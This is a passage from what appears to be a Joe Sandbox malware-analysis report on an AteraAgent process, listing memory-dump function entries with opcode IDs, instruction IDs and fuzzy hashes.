                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 1aaadbbfcb21bc2e7c53ec0eca1ae1f4194502b1acdd0ecd63c4e5545eefbaae
                                                                                                                                                                                                                                                                            • Instruction ID: 992802590347a644d46d33821c65818afd5647d9c599bd48c440d3c4ccfa67f4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1aaadbbfcb21bc2e7c53ec0eca1ae1f4194502b1acdd0ecd63c4e5545eefbaae
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1C1E76190EE868FF795DB6888559A57BE0EF53350F1842FED08DCB1A3E9389C4987C0
                                                                                                                                                                                                                                                                            Function 00007FFAAB45C536 Relevance: .3, Instructions: 336COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 7bf330d50cd8b41192ac28088529cf0d7ce0818f4e4f0621423b4ca614db734d
                                                                                                                                                                                                                                                                            • Instruction ID: 18bac648b2ae7128446f1714760374063b0735707cec0dc7e4753478a68721d9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7bf330d50cd8b41192ac28088529cf0d7ce0818f4e4f0621423b4ca614db734d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0EB1C27050DA4D8FEB68EF28C855BE93BD1FF59350F04826EE44DC7292CA74A945CB82
                                                                                                                                                                                                                                                                            Function 00007FFAAB45D7BE Relevance: .3, Instructions: 322COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 60d8221dd48f7bd08671760b9e45cb86b9488f893e69e853bb17da250bfdbf07
                                                                                                                                                                                                                                                                            • Instruction ID: 450fce5ffb77a23925935d16d9bf6178de60c881e2bf3ecbb91a5aeb7e6ef7d8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 60d8221dd48f7bd08671760b9e45cb86b9488f893e69e853bb17da250bfdbf07
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3DB1B674908A5D8FDF94EF68C894BA9BBF1FF69301F1041AAD00DE7261DA34AD85CB40
                                                                                                                                                                                                                                                                            Function 00007FFAAB451AC8 Relevance: .3, Instructions: 284COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 36a298065cc896075b996f281cab132fcb437d6b6e3b273e2dfb824c81116188
                                                                                                                                                                                                                                                                            • Instruction ID: c0d38b6a0f1a5e178a0e4526b2e602b875ae91a4e1b52347d356a34a4953e29f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 36a298065cc896075b996f281cab132fcb437d6b6e3b273e2dfb824c81116188
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40B19E7180A66A8FD765DB64C8557E8BBF1EF45350F1441F9C04EA72A2CA7C1E8ACF40
                                                                                                                                                                                                                                                                            Function 00007FFAAB457A45 Relevance: .3, Instructions: 275COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 0e496408c6a0586e32373116cf60fc000c9cc0adb3d2426919e5a8d4a0a7c53c
                                                                                                                                                                                                                                                                            • Instruction ID: 578c38151bbc9ce7175433219f4f17bd9e3fbae7511f3dabd169b901a749d64d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e496408c6a0586e32373116cf60fc000c9cc0adb3d2426919e5a8d4a0a7c53c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0791B07180EB899FD742DBA49815AE9BFF0EF16320F0801FED049DB1A3DA6C5885C791
                                                                                                                                                                                                                                                                            Function 00007FFAAB45347E Relevance: .2, Instructions: 196COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 0faee1714bcb09e72891f3d9fef532b0b05cd34f03d403bd62491d27f3faa855
                                                                                                                                                                                                                                                                            • Instruction ID: 3731699ad025769e7fcdd8d041123fd473038551272318484045ff2bd8d14577
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0faee1714bcb09e72891f3d9fef532b0b05cd34f03d403bd62491d27f3faa855
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4561487090AA5DCFDBA5DB68C4457ACB7B1FF16340F5082ADC00EE7291CA386D89CB81
                                                                                                                                                                                                                                                                            Function 00007FFAAB45946C Relevance: .2, Instructions: 195COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: e96ed79459a157afbf1e1a4c03156ebb0066f59c7d4e0003a8957dfb2a185ddc
                                                                                                                                                                                                                                                                            • Instruction ID: 239c0082c65cea63888099dd295886559025a71d386a6baf17328d55f96ac6bf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e96ed79459a157afbf1e1a4c03156ebb0066f59c7d4e0003a8957dfb2a185ddc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E516271908A1C8FDB58DB68D845BE9BBF1FF59310F0082AAD04DD3252DE34A9858F81
                                                                                                                                                                                                                                                                            Function 00007FFAAB45E641 Relevance: .2, Instructions: 190COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 237f428dcc09dae57a36f68c15df56319e40e774bb7c7eca20a62a6db70a84c0
                                                                                                                                                                                                                                                                            • Instruction ID: 6133b9bc52af119f3cbab0dd5eba456b45cc11d092ff506a3ea7ebcc2659bad0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 237f428dcc09dae57a36f68c15df56319e40e774bb7c7eca20a62a6db70a84c0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC512B3094990DCFDB84EFA8D455AEDB7B5FF5A300F5045ADD00EE72A1DA34A845CB90
                                                                                                                                                                                                                                                                            Function 00007FFAAB458570 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 1036dcd44dc44c602e78c5f3436c70b4941c6d8cc520807b089d1416a4b65147
                                                                                                                                                                                                                                                                            • Instruction ID: d16ef53036ab5032d1f3ead568ef4b871a95a7592346534530ed2a2907ff4c36
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1036dcd44dc44c602e78c5f3436c70b4941c6d8cc520807b089d1416a4b65147
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D51417090991D8FDBA8EB68D498BEDBBB1EF59301F1041AAD00DE72A1DB7599C4CF40
                                                                                                                                                                                                                                                                            Function 00007FFAAB4563FB Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 6651a9485e6e2dc0ce0582f9748ecae0e30b75d0d2b4283baf5fc7e14f63c127
                                                                                                                                                                                                                                                                            • Instruction ID: 004afa2d17ad76b28a4c6e14978bfa9a200e9bf2df8a3296407fdee99d9c48a9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6651a9485e6e2dc0ce0582f9748ecae0e30b75d0d2b4283baf5fc7e14f63c127
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D841E67560DEDA8FE781DF28D8515EA77A0FF57360B0442BAD45DC71A2CA34AC06C781
                                                                                                                                                                                                                                                                            Function 00007FFAAB458372 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 85475030b9da2ec6fb2fd36fb8f2dbbc29a298b614b6b773698f040c8d876fc6
                                                                                                                                                                                                                                                                            • Instruction ID: 3873298c7be06e5684ff605fc60a3c7a289e8f9bfd84737ac772c4c3b27899ad
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85475030b9da2ec6fb2fd36fb8f2dbbc29a298b614b6b773698f040c8d876fc6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E411570909A1D8FDB94DBA8C8987EDBBF1FF5A310F5041A9C04DE7261CB399985CB40
                                                                                                                                                                                                                                                                            Function 00007FFAAB54052C Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1539302930.00007FFAAB540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB540000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab540000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 04e52be6984b09df51d3db3d588aa98518e1166610957f604122491f47f878ec
                                                                                                                                                                                                                                                                            • Instruction ID: f0e936be67af31c8c04343cb641c2f56def58b131d85015a617a2dad3c3a8394
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04e52be6984b09df51d3db3d588aa98518e1166610957f604122491f47f878ec
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF31262170DF8A8FE796E77C88569B53BD2EB6A21070841BAD04EC32B3DD18AC4583C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB453368 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 0a576130b74268aa34f6adc2d9634c6734012aa1394c3ce5e35bb58f2aaec5ec
                                                                                                                                                                                                                                                                            • Instruction ID: af13451fdbbd593d1ee0579654553ab89515c83ba00a181dfe06ac8313ddfcbf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a576130b74268aa34f6adc2d9634c6734012aa1394c3ce5e35bb58f2aaec5ec
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8931A97090AB8A8FE7A5DB2884557A877B1EF46350F0041FED00DD72A2CA795C89CB41
                                                                                                                                                                                                                                                                            Function 00007FFAAB451980 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 83f8360ae57b605c1385618c94587e4a02193a04366e9d985015796b173f4ad4
                                                                                                                                                                                                                                                                            • Instruction ID: 3cb29a07c50eb69d3c852b5ce396c3c3f546062355c21f6c7a0714de4f49e228
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 83f8360ae57b605c1385618c94587e4a02193a04366e9d985015796b173f4ad4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D312971C4A66ACFE769DB60C4543F9B6B0AF06340F1055BDD00EA72A1CA785EC8DF44
                                                                                                                                                                                                                                                                            Function 00007FFAAB454EFA Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: a69fde200b6edaaac0e5327ed0ed4426fedd55deda1e5891dc7b0cee3ec02cb0
                                                                                                                                                                                                                                                                            • Instruction ID: 972f7a36a16084458fab5af2ec85d8963723993ecff620691c40487bc1a7542f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a69fde200b6edaaac0e5327ed0ed4426fedd55deda1e5891dc7b0cee3ec02cb0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05210572A09B8D5FD702EB6CE8614E67BA0FF86221B0502BBE04CC71A7C9245809C391
                                                                                                                                                                                                                                                                            Function 00007FFAAB45848D Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 034b1cd508931597baad332dd7923dcec6245394e2a539574b9483c234b107c8
                                                                                                                                                                                                                                                                            • Instruction ID: 81d7162ba4211064e4506e9caf81be04ab9582ca0ac5475c3efe3eff8d06cf59
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 034b1cd508931597baad332dd7923dcec6245394e2a539574b9483c234b107c8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4231A27090AA1DCFDB94DB58D498AECBBF4EF1A311F1001A9D04DE7261DB79AE84CB40
                                                                                                                                                                                                                                                                            Function 00007FFAAB457DC1 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 2477b3d2f94c5ac341af2bac57e688c8953017ab1ee70fc270a3cda80acbf7b0
                                                                                                                                                                                                                                                                            • Instruction ID: 421118303ee8ed90dcaf276f9f819e5d63bf516ddf5e665de38730e7869159ac
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2477b3d2f94c5ac341af2bac57e688c8953017ab1ee70fc270a3cda80acbf7b0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68219D70D09A5D9FEB81EBA8C849AEDBBF1FF59310F10057AD008E7262DB385885CB41
                                                                                                                                                                                                                                                                            Function 00007FFAAB45E6D9 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: aef6da0376665d75e3782846523d02a43b1b20f906258a4dd7ac6f38d1ac29ee
                                                                                                                                                                                                                                                                            • Instruction ID: 6326dd29fa21a15c3af4510db2a96bddb406c7626629eea893c3d15f3bc0b9ff
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aef6da0376665d75e3782846523d02a43b1b20f906258a4dd7ac6f38d1ac29ee
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35212631949A59CFDB48DFA4D810AFEB7B5FB46300F0546AAE00ED72A2CB346854CB90
                                                                                                                                                                                                                                                                            Function 00007FFAAB45D20F Relevance: .1, Instructions: 80COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 017d4072e7df92a0c8fc3c5d4effe5d65810d4aa58e0eda086ef254871b0b0fd
                                                                                                                                                                                                                                                                            • Instruction ID: 12b3f8927335860640e36a4db5f0d94c98781e187f25ab6ee81fabddc9f8663e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 017d4072e7df92a0c8fc3c5d4effe5d65810d4aa58e0eda086ef254871b0b0fd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7212870D09A0DDFDB85DBA4D455AECB7B1FF5A300F5041B9E00ED72A1CA389885CB41
                                                                                                                                                                                                                                                                            Function 00007FFAAB451B2F Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 1749fd90887dfab5b0a9402a8fbf8fcb50cf9776ed7e68ee464dc67bde7ebd5f
                                                                                                                                                                                                                                                                            • Instruction ID: 4751fd3d8ca8aa409ca346fe85572a6cb04b8150e19f2f864254978030fe464f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1749fd90887dfab5b0a9402a8fbf8fcb50cf9776ed7e68ee464dc67bde7ebd5f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4312B3090966D8FDBA9DB28C855BE8B7F1EF59341F1001E9D04EE72A1CA785E85CF40
                                                                                                                                                                                                                                                                            Function 00007FFAAB451E23 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: e38bd2263285084f422309aefe628810054bea69445ff35c0eba1e2bc43d7d32
                                                                                                                                                                                                                                                                            • Instruction ID: 18c2adc8ccb812165e6c00b5b987fa53aefd8a2a42376136a2867c4aa7a6352a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e38bd2263285084f422309aefe628810054bea69445ff35c0eba1e2bc43d7d32
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B3128B0D0A6299FEBA6DB6488457E9B7F0AF19340F4442E9D04DD32A2DA785EC5CF40
                                                                                                                                                                                                                                                                            Function 00007FFAAB450C1D Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 62b58f5906f5404aa8a97bf8517ec8f1a8ccd969128b41e3e6ae81d7286cd59b
                                                                                                                                                                                                                                                                            • Instruction ID: 89bc7eab7d9a49d5eb406dd5fac381bbdb0371b5a66396b627c8b74357b942c0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62b58f5906f5404aa8a97bf8517ec8f1a8ccd969128b41e3e6ae81d7286cd59b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F11E7A150FA828FE71A9BB484292A97FE1AF02254F4945BFC059872F3DA6C5D48C781
                                                                                                                                                                                                                                                                            Function 00007FFAAB45483D Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
